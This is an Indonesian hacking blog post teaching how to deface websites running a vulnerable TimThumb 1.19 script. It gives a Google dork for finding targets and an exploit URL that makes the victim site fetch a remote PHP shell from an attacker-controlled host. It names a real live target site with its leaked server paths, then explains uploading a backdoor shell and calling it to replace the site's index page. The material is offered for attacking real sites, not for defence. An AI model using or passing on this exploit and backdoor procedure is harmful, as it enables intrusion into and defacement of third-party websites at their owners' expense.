Safelink

Tutorial Deface Timthumb V.1.xxx

Tutorial Deface Timthumb V.1.xxx - Hello sobat Bekasicode kembali lagi di channel saya ini di artikel kali ini saya akan mengajarkan kalian bagaimana tutorial Deface Timthumb V.1.xxx sebelum ke artikelnya saya ingin memperkenalkan diri saya terlebih dahulu saya bernickname ImamKun dari team jakarta paranoid team dah jika saya ada salah kata dalam artikel ini saya meminta maaf karna saya baru sekali nulis artikel di blog teman saya ini ok langsung saja gimana kalian penasaran bukan langsung saja ke bahan bahannya jika sudah komplit langsung saja ke caranya

[+] Bahan - Bahan [+]
Dork : inurl:/timthumb.php atau bisa kalian ambil di sini (Kembangin lagi make otak hacker kalian )
Exploit : ?src=http;//picasa.com.2pproject.ca/shell.php
shell jika kalian blom punya silahkan kalian ambil disini
Script saya rasa kalian sudah mempunyainya ya :)

Ok langsung saja ketutorialnya ikutin langkah langkah dibawah ini ya sobat Bekasicode Oke karna di artikel kali ini saya sudah mempunyai target saya akan memakai target saja 

Live Target : http://thiepcuoingocanh.com/admin/timthumb.php

Oke langsung saja lanjut ke langkah langkahnya yang

pertama harus kalian dorking ke goggle search atau mbah goggle ea nnti disitu akan banyak sekali website kalian pilih salah satu website yang menurut kalian vuln 

jika sudah memasukin website yang menurut kalian vuln langsung saja masukan exploitnya bagaimana tuh min cara penempatannya oke buat kalian yang tidak tahu cara penempatannya silahkan kalian lihat dibawah ini 

http://thiepcuoingocanh.com/admin/timthumb.php?src=http://picasa.com.2pproject.ca/shell.php
http://thiepcuoingocanh.com/[Patch]/admin/timthumb.php?src=http://picasa.com.2pproject.ca/shell.php

Oiya Jika Website Vuln maka tampilannya akan seperti gambar dibawah ini
nah bisa kalian lihat poto diatas menunjukan versi timthumbnya memiliki versi V1.19 berarti itu vuln dan setelah itu kalian masukan exploitnya seperti diatas gambar ini nah setelah kalian sudah memasukin exploitnya di dalam website itu nanti akan ada bacaan yang keluar dari website tersebut untuk lebih lengkap tulisan bacaan itu silahkan kalian lihat dibawah ini

Unable to open image : /home/thiepcuoih/domains/thiepcuoingocanh.com/public_html/admin/webroot/./cache/21a56a11084a89bfd163f3e2778e47ce.php Query String : src=http://picasa.com.2pproject.ca/shell.php TimThumb version : 1.19

Nah jika nongol seperti itu silahkan kalian copy dari admin samapai ke tulisan dang angka.php contoh seperti dibawah ini

targetkalian.com/admin/webroot/./cache/21a56a11084a89bfd163f3e2778e47ce.php

nah jika sudah di copy nanti akan ada tempat uploadernya si timthumb tersebut untuk lebih lengkapnya silahkan lihat gamar dibawah ini
nah jika sudah ada tempat uploadernya silahkan kalian click chose file nnti disitu kalian akan dibawah ke file kalian setelah itu terserah kalian mau langsung upload script atau shellbackdoor kalian disini saya lebih memilih upload shell backdoor karna bisa nebas index websitenya hehe :V 

Jika Kalian sudah menguploadnya nnti akan ada bacaan Sukses Om !!!  Dan tinggal kalian panggil saja deh script deface atau shell backdoor kalian bagaimana cara manggilnya ? silahkan lihat tutorial dibawah ini

http://thiepcuoingocanh.com/admin/webroot/cache/namashellkalian.php / scriptkalian.html
targetkalian.com/admin/webroot/cache/namashellkalian.php / scriptkalian.html

nah saya rasa tutorial ini cukup simple ya buat kalian yang pemula seperti saya ini dan cukup sekian artikel saya kali ini jangan lupa panteng trus blog kami dan blog saya ImamKun 

www.maslahatinfo.online 
imamkunid.blogspot.com

itu adalah blog Saya/ImamKun Bye Bye

Berlangganan update artikel terbaru via email:

Tampilkan Komentar
Sembunyikan Komentar

0 Response to "Tutorial Deface Timthumb V.1.xxx "

Post a Comment

Berikan kami komentar, apabila ada yang tidak dimengerti

Iklan Atas Artikel

Iklan Tengah Artikel 1

Iklan Tengah Artikel 2

Iklan Bawah Artikel

Like this blog? Keep us running by whitelisting this blog in your ad blocker.

This is how to whitelisting this blog in your ad blocker.

Thank you!

×